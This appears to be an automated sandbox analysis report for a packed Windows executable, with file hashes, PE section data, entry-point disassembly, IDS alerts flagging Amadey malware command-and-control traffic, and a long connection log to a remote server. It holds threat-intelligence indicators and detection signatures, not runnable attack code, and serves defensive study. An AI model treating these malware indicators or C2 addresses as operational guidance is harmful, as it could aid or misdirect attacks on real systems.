                  SHA-512:0226615ECE7CA9A66217B61380959A616A46537DC0F45BE8DA5A82BEC78E0C075883CB14A4C54206B5A24D9977663E9D9CA5960E5AA717D52377FF4C684D8DD7
                  Malicious:false
                  Reputation:low
                  Preview:......G3.d.A.....-j.F.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.0.d.8.f.5.e.b.8.a.7.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0.................2.@3P.........................
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.955496476230148
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:11NdzR12PS.exe
                  File size:1'921'536 bytes
                  MD5:291a8d56e77cb07be1a6b4308d51650b
                  SHA1:310e47b223740de2989f5c8f4b12d294e6568a2c
                  SHA256:fda0fc105ffd6faae12d08c243fe684be8c69696bd654d733f5caf487b59baae
                  SHA512:7f764a84720ddd1b2792747797befb2272eb33dc4ce141c78bef87356e7c861451588678e2a041084db3b96a8a23b191d864f93e66f8ffefe368fbb494f0165d
                  SSDEEP:49152:N4T6hIyXZjUqy6rCPkriwTB3/4z/vVaHAZT:+T6hI9DQi64z/vs
                  TLSH:DF95336754F092B1D49235390D2FFA52EB389BDF507E62E8E87F8216A57835E7390320
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................
                  Icon Hash:90cececece8e8eb0
                  Entrypoint:0x8c2000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66A24110 [Thu Jul 25 12:12:00 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:6
                  OS Version Minor:0
                  File Version Major:6
                  File Version Minor:0
                  Subsystem Version Major:6
                  Subsystem Version Minor:0
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
                  Instruction
                  jmp 00007FF340E54EEAh
                  wrmsr
                  sbb eax, 00000000h
                  add cl, ch
                  add byte ptr [eax], ah
                  add byte ptr [eax], al
                  inc ecx
                  push bx
                  dec esi
                  dec ebp
                  das
                  xor al, 36h
                  dec edi
                  bound ecx, dword ptr [ecx+4Ah]
                  dec edx
                  insd
                  push edi
                  dec eax
                  dec eax
                  jbe 00007FF340E54F52h
                  push esi
                  dec edx
                  popad
                  je 00007FF340E54F4Bh
                  push edx
                  dec esi
                  jc 00007FF340E54F5Ah
                  cmp byte ptr [ebx], dh
                  push edx
                  jns 00007FF340E54F27h
                  or eax, 49674B0Ah
                  cmp byte ptr [edi+43h], dl
                  jnc 00007FF340E54F2Dh
                  bound eax, dword ptr [ecx+30h]
                  pop edx
                  inc edi
                  push esp
                  push 43473163h
                  aaa
                  push edi
                  dec esi
                  xor ebp, dword ptr [ebx+59h]
                  push edi
                  push edx
                  pop eax
                  je 00007FF340E54F37h
                  xor dl, byte ptr [ebx+2Bh]
                  popad
                  jne 00007FF340E54F2Ch
                  dec eax
                  dec ebp
                  jo 00007FF340E54F23h
                  xor dword ptr [edi], esi
                  inc esp
                  dec edx
                  dec ebp
                  jns 00007FF340E54F30h
                  insd
                  jnc 00007FF340E54F50h
                  aaa
                  inc esp
                  inc ecx
                  inc ebx
                  xor dl, byte ptr [ecx+4Bh]
                  inc edx
                  inc esp
                  bound esi, dword ptr [ebx]
                  or eax, 63656B0Ah
                  jno 00007FF340E54F38h
                  push edx
                  insb
                  js 00007FF340E54F51h
                  outsb
                  inc ecx
                  jno 00007FF340E54F32h
                  push ebp
                  inc esi
                  pop edx
                  xor eax, dword ptr [ebx+36h]
                  push eax
                  aaa
                  imul edx, dword ptr [ebx+58h], 4Eh
                  aaa
                  inc ebx
                  jbe 00007FF340E54F2Ch
                  dec ebx
                  js 00007FF340E54F23h
                  jne 00007FF340E54F11h
                  push esp
                  inc bp
                  outsb
                  inc edx
                  popad
                  dec ebx
                  insd
                  dec ebp
                  inc edi
                  xor dword ptr [ecx+36h], esp
                  push 0000004Bh
                  sub eax, dword ptr [ebp+33h]
                  jp 00007FF340E54F3Ch
                  dec edx
                  xor bh, byte ptr [edx+56h]
                  bound eax, dword ptr [edi+66h]
                  jbe 00007FF340E54F1Ah
                  dec eax
                  or eax, 506C720Ah
                  aaa
                  xor dword ptr fs:[ebp+62h], ecx
                  arpl word ptr [esi], si
                  inc esp
                  jo 00007FF340E54F53h
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0570x6b.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x4c05600x10wokugkrf
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x4c05100x18wokugkrf
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x680000x2dc005c6bf0b7c7f5078da88f9a2ae07806a8False0.9997064976092896data7.980756696745502IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0x690000x1e00x200164c3d0e6ce4fc9b310b90a7bf557befFalse0.576171875data4.558318256855509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x6a0000x10000x200cc76e3822efdc911f469a3e3cc9ce9feFalse0.1484375data1.0428145631430756IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x6b0000x2b20000x20088b76c495d8038c796b8e0691c5d6018unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  wokugkrf0x31d0000x1a40000x1a380075e919d9b9d10ab906b93ec25c73dda5False0.9944071718563766data7.954605137442367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  csqdmnjl0x4c10000x10000x6000b4bdba7c484905c25c3b870cf5125edFalse0.5638020833333334data5.003360902210379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x4c20000x30000x2200d910be3f5401773e6f40462ecce812c4False0.3922334558823529DOS executable (COM)4.131489801965212IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_MANIFEST0x4c05700x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                  DLLImport
                  kernel32.dlllstrcpy
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                  2024-07-27T04:50:06.678835+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973980192.168.2.4185.215.113.19
                  2024-07-27T04:50:15.926387+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34974680192.168.2.4185.215.113.19
                  2024-07-27T04:50:04.436087+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973780192.168.2.4185.215.113.19
                  2024-07-27T04:49:19.969599+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973052.165.165.26192.168.2.4
                  2024-07-27T04:50:05.535513+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34973880192.168.2.4185.215.113.19
                  2024-07-27T04:50:20.029073+0200TCP2856147ETPRO MALWARE Amadey CnC Activity M34974980192.168.2.4185.215.113.19
                  2024-07-27T04:49:58.053817+0200TCP2022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow4434973652.165.165.26192.168.2.4
                  TimestampSource PortDest PortSource IPDest IP
                  Jul 27, 2024 04:50:03.418380022 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:03.424717903 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:03.424942970 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:03.424983025 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:03.430469990 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.435867071 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.436086893 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.437208891 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.437308073 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.438379049 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.443809986 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.690713882 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.691245079 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.794495106 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.794893026 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.799793959 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.799856901 CEST8049737185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:04.799953938 CEST4973780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.800107956 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.800107956 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:04.804903984 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.535300016 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.535512924 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.536300898 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.541755915 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.780839920 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.780942917 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.905524969 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.906097889 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.911147118 CEST8049738185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.911189079 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:05.911251068 CEST4973880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.911268950 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.911653042 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:05.916574955 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:06.678591013 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:06.678834915 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:06.679553032 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:06.685216904 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:07.275886059 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:07.276369095 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.388221979 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.388566971 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.393886089 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:07.394129992 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.394228935 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.394474030 CEST8049739185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:07.394628048 CEST4973980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:07.399590969 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:08.162256956 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:08.162451029 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:08.163115978 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:08.168514967 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.382258892 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.382395983 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.382431030 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.382715940 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.382716894 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.497584105 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.497999907 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.503031969 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.503134012 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.503314972 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.507145882 CEST8049740185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:09.507237911 CEST4974080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:09.508161068 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.278546095 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.278765917 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.279540062 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.284920931 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.531975985 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.532161951 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.669365883 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.672514915 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.675065041 CEST8049741185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.675168037 CEST4974180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.677459002 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:10.677700996 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.678642035 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:10.683685064 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.412758112 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.412821054 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.413577080 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.419301033 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.660523891 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.660886049 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.763428926 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.763784885 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.769326925 CEST8049742185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.769371986 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:11.769537926 CEST4974280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.769587040 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.769718885 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:11.775171995 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.537734032 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.537847042 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.538479090 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.543351889 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.790344000 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.790601969 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.905525923 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.905832052 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.911456108 CEST8049743185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.911658049 CEST4974380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.912430048 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:12.912592888 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.912672043 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:12.918082952 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:13.665246010 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:13.665512085 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:13.666126013 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:13.671324015 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:13.915050983 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:13.915112019 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.028786898 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.029047012 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.034578085 CEST8049744185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:14.034665108 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:14.034739017 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.034778118 CEST4974480192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.034913063 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.040126085 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:14.781486034 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:14.781919003 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.782449961 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:14.787828922 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.029051065 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.029470921 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.138698101 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.139075041 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.144527912 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.144577026 CEST8049745185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.144747972 CEST4974580192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.144942999 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.144942999 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.150194883 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.926115036 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:15.926387072 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.927194118 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:15.932284117 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:16.907579899 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:16.907705069 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.013215065 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.013607025 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.019074917 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:17.019170046 CEST8049746185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:17.019243956 CEST4974680192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.019299030 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.019382954 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.024609089 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:17.773473978 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:17.773926973 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.774467945 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:17.780124903 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.023941994 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.024010897 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.138326883 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.138668060 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.148523092 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.149038076 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.149038076 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.154613972 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.166368961 CEST8049747185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.166680098 CEST4974780192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.919363022 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:18.919830084 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.921818972 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:18.927139044 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:19.171632051 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:19.171766043 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.278733969 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.279191971 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.284354925 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:19.284396887 CEST8049748185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:19.284439087 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.284467936 CEST4974880192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.284646034 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:19.290431976 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.028937101 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.029073000 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.032079935 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.037504911 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.315298080 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.315393925 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.425595999 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.425843954 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.431013107 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.431091070 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.431212902 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.431417942 CEST8049749185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:20.431472063 CEST4974980192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:20.436232090 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.179347038 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.179425955 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.180248976 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.185583115 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.438505888 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.438841105 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.544967890 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.545444012 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.551064968 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.551105976 CEST8049750185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:21.551184893 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.551215887 CEST4975080192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.551347971 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:21.556551933 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.318650007 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.318756104 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.323117971 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.329235077 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.575063944 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.575388908 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.685419083 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.685863018 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.691539049 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.691780090 CEST8049751185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:22.691823959 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.691999912 CEST4975180192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.709281921 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:22.714860916 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.451471090 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.451929092 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.453860044 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.459378958 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.703874111 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.703984022 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.810537100 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.810933113 CEST4975380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.816325903 CEST8049753185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.816447973 CEST8049752185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:23.816610098 CEST4975280192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.816632986 CEST4975380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.816864014 CEST4975380192.168.2.4185.215.113.19
                  Jul 27, 2024 04:50:23.821945906 CEST8049753185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:24.573972940 CEST8049753185.215.113.19192.168.2.4
                  Jul 27, 2024 04:50:24.574311972 CEST4975380192.168.2.4185.215.113.19
